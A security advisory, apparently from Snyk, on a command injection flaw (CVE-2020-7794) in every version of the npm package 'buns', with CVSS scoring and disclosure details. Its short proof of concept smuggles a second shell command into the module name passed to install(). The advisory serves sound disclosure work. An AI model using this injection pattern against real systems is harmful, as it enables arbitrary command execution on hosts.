Command Injection

Affecting buns package, ALL versions

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

Affected versions of this package are vulnerable to Command Injection. The injection point is located in line 678 in index file lib/index.js in the exported function install(requestedModule).

PoC

var root = require("buns");
var name = "& touch JHU";
root.install(name);

Remediation

There is no fixed version for buns.

References

CVSS Score

8.6
high severity
  • Attack Vector
    Network
  • Attack Complexity
    Low
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    High
  • Integrity
    Low
  • Availability
    Low
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:P/RL:U/RC:C
Credit
JHU System Security Lab
CVE
CVE-2020-7794
CWE
CWE-78
Snyk ID
SNYK-JS-BUNS-1050389
Disclosed
11 Dec, 2020
Published
08 Jan, 2021